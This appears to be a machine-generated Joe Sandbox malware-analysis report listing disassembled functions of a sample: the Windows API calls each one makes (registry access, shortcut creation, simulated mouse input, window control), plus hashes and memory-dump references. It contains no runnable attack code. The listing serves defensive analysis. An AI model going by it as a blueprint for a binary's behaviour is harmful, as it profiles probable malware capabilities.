                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7ab4e4522df1a5d7a01a4217fd3014a07725063e1b86b206bd75d59396487a48
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8281EA71A20B069BF7219F69CCC1BAA73E9AF54324F24412AF511D76C3EBB0DD608B54
                                                                                                                                                                                                                                                                                                                            Function 00206571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001F8649,001F8649,?,?,?,002067C2,00000001,00000001,8BE85006), ref: 002065CB
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002067C2,00000001,00000001,8BE85006,?,?,?), ref: 00206651
                                                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0020674B
                                                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00206758
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00203B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,001F6A79,?,0000015D,?,?,?,?,001F85B0,000000FF,00000000,?,?), ref: 00203BC5
                                                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00206761
                                                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00206786
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 99d5fa2cb090e7ec064b0966de661bfa77db75c1e018a8e8ceed610e9f077d43
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6ce1b0d93d7aa66d478cca62a269b237f4c1e7fd98a0667da6b61795c72fc54e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99d5fa2cb090e7ec064b0966de661bfa77db75c1e018a8e8ceed610e9f077d43
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4510472620307AFEB248E64CC89EBBB7A9EB40714F144269FC14D61D2EB75DC70C660
                                                                                                                                                                                                                                                                                                                            Function 0025C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0025C10E,?,?), ref: 0025D415
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D451
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4C8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4FE
                                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0025C72A
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0025C785
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0025C7CA
                                                                                                                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0025C7F9
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0025C853
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0025C85F
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6d15c0848422f6247e0a46fe382bfa16a0c0549242ec25af6d4d78c321d950c0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 925cbe4982da7c184579017dac378d3505c6b4467a3a33b0e40bf0ef8fe1226f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d15c0848422f6247e0a46fe382bfa16a0c0549242ec25af6d4d78c321d950c0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C818D30618341AFC715DF24C885E2ABBE9BF88308F24859DF4554B2A2DB71ED59CB91
                                                                                                                                                                                                                                                                                                                            Function 0023009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000035), ref: 002300A9
                                                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00230150
                                                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00230354,00000000), ref: 00230179
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00230354), ref: 0023019D
                                                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(00230354,00000000), ref: 002301A1
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 002301AB
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0df7cb1e1f576890b3dea31a0a5dde79882a8198745a5b1b36f1106781df3507
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ce5011dbb72fedb88d3e7ef9dbcf8c740c496e1c69b3233e771d9c1fc690bdec
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0df7cb1e1f576890b3dea31a0a5dde79882a8198745a5b1b36f1106781df3507
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60511BB5A20311E6CF64AF6498E9B2AB3A5EF55310F108447FD06DF296DBB09C60CB71
                                                                                                                                                                                                                                                                                                                            Function 00246ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00246F21
                                                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0024707E
                                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00270CC4,00000000,00000001,00270B34,?), ref: 00247095
                                                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00247319
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                                                                                            • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 111fa7f44222a95534cd775eb73e1670a86804572fb3175d0a3490eb3da859d7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d836e1c8098295dd42aefa315c709d8a377044b7fee476d244e62037d82f3d5c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 111fa7f44222a95534cd775eb73e1670a86804572fb3175d0a3490eb3da859d7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2D15971518201AFC304EF24C881E6BB7E9FF99708F50495EF5968B262DB71ED09CB92
                                                                                                                                                                                                                                                                                                                            Function 00241196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 002411B3
                                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 002411EE
                                                                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0024120A
                                                                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00241283
                                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0024129A
                                                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 002412C8
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d8c27e6e049a571bc7750ca1b1fe286749a06647cde2e6424625bb13a6cc5a5b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f17077a322c37f5253fb8cc9c22594362fd49663438c6b0efead7854ec37e1c0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8c27e6e049a571bc7750ca1b1fe286749a06647cde2e6424625bb13a6cc5a5b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42416F71A10219EFDF05DF64DC85AAA77B8FF04310F1480A5EE049A296DB70DEA1DBA0
                                                                                                                                                                                                                                                                                                                            Function 00268C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0022FBEF,00000000,?,?,00000000,?,002139E2,00000004,00000000,00000000), ref: 00268CA7
                                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00268CCD
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00268D2C
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00268D40
                                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00268D66
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00268D8A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 486b3c1487857eba5841ff20f190f7c069efbd4ce90d8dae203f3b3038f5be42
                                                                                                                                                                                                                                                                                                                            • Instruction ID: e46968b6745e1b1d6d1b11f1992c0476b1d95449f8e0ac600e0075bd0494dc3a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 486b3c1487857eba5841ff20f190f7c069efbd4ce90d8dae203f3b3038f5be42
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE41BA30601246EFDB29DF24D889BA67BF1FB46704F244265E9084B1B2DB7168D9CB60
                                                                                                                                                                                                                                                                                                                            Function 00252D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 00252D45
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0024EF33: GetWindowRect.USER32(?,?), ref: 0024EF4B
                                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00252D6F
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00252D76
                                                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00252DB2
                                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00252DDE
                                                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00252E3C
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b8329ec57cbc695350b0c9caf49298c517c627507979c77ee220af8fc231f024
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c96738b7c561bd1680ceb82549a72b971aded7a0dd0485c6dd24722635f21199
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8329ec57cbc695350b0c9caf49298c517c627507979c77ee220af8fc231f024
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98312272A15316ABC720DF14E849F9BB7A9FF85314F00091AF885A7181CB71E91CCBD2
                                                                                                                                                                                                                                                                                                                            Function 002355E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 002355F9
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00235616
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0023564E
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023566C
                                                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00235674
                                                                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 0023567E
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 33c6df36859b6f7a6e5636fcee46cb35f8b6ad98ab959ddf3ad921fe5ca9a60d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 03703ef01dff12a69ccb415e0f5bcd10642f71ebf23a06f424aae59414b9ee98
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33c6df36859b6f7a6e5636fcee46cb35f8b6ad98ab959ddf3ad921fe5ca9a60d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF2168B26146187BEB165F35EC4AE7B7BECDF48710F008029F909CA091EBB0DC508AA0
                                                                                                                                                                                                                                                                                                                            Function 00246263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001D55D1,?,?,00214B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 001D5871
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 002462C0
                                                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 002463DA
                                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00270CC4,00000000,00000001,00270B34,?), ref: 002463F3
                                                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00246411
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                                                                                            • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c63c06ca53243585c7a7a591ab62dae0306d005aa0b2d9b777e6c4f708e76f65
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 28591c31f3ead142be3adc8e19b5ecb16db0b6ef10f6dce4afa106c124f5d0b1
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c63c06ca53243585c7a7a591ab62dae0306d005aa0b2d9b777e6c4f708e76f65
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95D12471A142019FC718DF14C48892ABBF6FF9A714F14899DF8899B361CB31EC45CB92
                                                                                                                                                                                                                                                                                                                            Function 001F36F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,001F36E9,001F3355), ref: 001F3700
                                                                                                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001F370E
                                                                                                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001F3727
                                                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,001F36E9,001F3355), ref: 001F3779
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
